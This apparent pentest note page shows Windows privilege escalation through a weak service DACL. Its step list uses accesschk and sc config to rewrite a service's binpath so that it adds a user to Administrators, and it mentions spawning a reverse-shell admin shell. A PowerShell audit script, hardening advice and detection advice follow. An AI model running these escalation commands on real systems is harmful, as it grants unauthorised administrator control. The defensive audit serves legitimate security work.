Binary Paths

PowerUp shows this under service permissions

WinPEAS shows this under services information

  1. Run accesschk64.exe -uwcv Everyone * to list the services on which the Everyone group has write access, and note the service name.
  2. For more detail on one service, run accesschk64.exe -uwcv daclsvc
  3. If we have CHANGE_CONFIG, check the current configuration: sc qc daclsvc
  4. Point the binary path at our command: sc config daclsvc binpath= "net localgroup administrators user /add"
  5. Run sc qc daclsvc again to check that BINARY_PATH_NAME has been set to the new value.
  6. Run net localgroup administrators. At this point you will only see the pre-existing members.
  7. Run sc start daclsvc (you may get an error; still run the next command to check).
  8. Run net localgroup administrators again to confirm that user has been added.

You can even set binpath= to the path of a reverse shell binary to spawn an admin shell.
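The whole procedure above depends on one misconfiguration: a service DACL that grants a low-privileged principal SERVICE_CHANGE_CONFIG (or a right such as WRITE_DAC that leads to it). The following PowerShell audit, added here as an example and not code from the coffeetohack page or from PowerUp/WinPEAS, parses each service's SDDL and reports exactly those grants, so an administrator can find the condition before anyone runs accesschk against it. It assumes Windows PowerShell 5.1 or later and sc.exe on PATH; the two SDDL strings, the service name daclsvc and the function names are constructed for the example.

```powershell
# Added audit example, not code from the coffeetohack page. It flags services whose
# DACL grants a low-privileged principal the right to rewrite binPath, which is the
# condition the accesschk step above looks for. Assumes Windows PowerShell 5.1 or
# later and sc.exe on PATH; the sample SDDL strings below are constructed.

# Service-specific access bits from winsvc.h, plus the standard rights that also
# allow taking over the service object. The SDDL letter for each bit is noted.
$ServiceRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002   # DC: may run sc config <svc> binpath=
    SERVICE_START         = 0x00000010   # RP
    SERVICE_STOP          = 0x00000020   # WP
    DELETE                = 0x00010000   # SD
    WRITE_DAC             = 0x00040000   # WD: may grant itself any right
    WRITE_OWNER           = 0x00080000   # WO
    GENERIC_ALL           = 0x10000000   # GA
    GENERIC_WRITE         = 0x40000000   # GW
}
# Rights that let the holder change or take over the service configuration.
$Dangerous = 0x00000002 -bor 0x00010000 -bor 0x00040000 -bor 0x00080000 -bor 0x10000000 -bor 0x40000000

# Principals every unprivileged interactive user belongs to.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

function Test-ServiceSddl {
    # Parse one service's SDDL and return a finding for every allow ACE that gives a
    # low-privileged principal a dangerous right. Returns nothing for a clean DACL.
    param([string]$ServiceName, [string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if (-not ($ace -is [System.Security.AccessControl.KnownAce])) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        if (($ace.AccessMask -band $Dangerous) -eq 0) { continue }
        # Name every listed right the ACE holds, not only the dangerous ones.
        $names = foreach ($r in $ServiceRights.GetEnumerator()) {
            if (($ace.AccessMask -band $r.Value) -ne 0) { $r.Key }
        }
        [pscustomobject]@{
            Service   = $ServiceName
            Principal = $LowPrivSids[$sid]
            Rights    = ($names -join ', ')
            # Without SERVICE_START a rewritten binPath only runs at the next
            # service start or reboot, which is why the page's sc start step matters.
            CanStart  = (($ace.AccessMask -band 0x10) -ne 0)
        }
    }
}

function Invoke-ServiceDaclAudit {
    # Live audit: fetch each service's SDDL with sc.exe sdshow and test it.
    # Services the caller may not query print no SDDL line and are skipped.
    foreach ($svc in Get-Service) {
        $line = & sc.exe sdshow $svc.ServiceName 2>$null |
            Where-Object { $_.Trim() -like 'D:*' } | Select-Object -First 1
        if ($line) { Test-ServiceSddl -ServiceName $svc.ServiceName -Sddl $line.Trim() }
    }
}

# Constructed sample: a typical default service DACL (SYSTEM, Administrators,
# Interactive, Service) with one extra ACE appended that grants Everyone (WD)
# SERVICE_CHANGE_CONFIG (DC) plus start and stop. This is the weak setting.
$WeakSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
            '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRRC;;;WD)'
# Hardened form: the same descriptor without the Everyone ACE. An administrator
# applies it with: sc.exe sdset <service> "<sddl>"
$SafeSddl = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
            '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)'

# Report for the weak descriptor (one finding), then for the hardened one (none).
Test-ServiceSddl -ServiceName 'daclsvc' -Sddl $WeakSddl | Format-Table -AutoSize
Test-ServiceSddl -ServiceName 'daclsvc' -Sddl $SafeSddl | Format-Table -AutoSize
# Invoke-ServiceDaclAudit | Format-Table -AutoSize   # audit every service on this host
```

The SDDL letters map directly onto what accesschk prints: DC is SERVICE_CHANGE_CONFIG, RP is SERVICE_START, WP is SERVICE_STOP, WD is WRITE_DAC. The fix is to remove the offending ACE with sc.exe sdset rather than to lock down the target binary, because the right being abused is on the service object, not on the file. For detection, the value that sc config binpath= rewrites is stored at HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath, so registry auditing on that key (Security event 4657) or a Sysmon registry rule (event 13) records the change whether or not the service is subsequently started.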


Last updated 4 years ago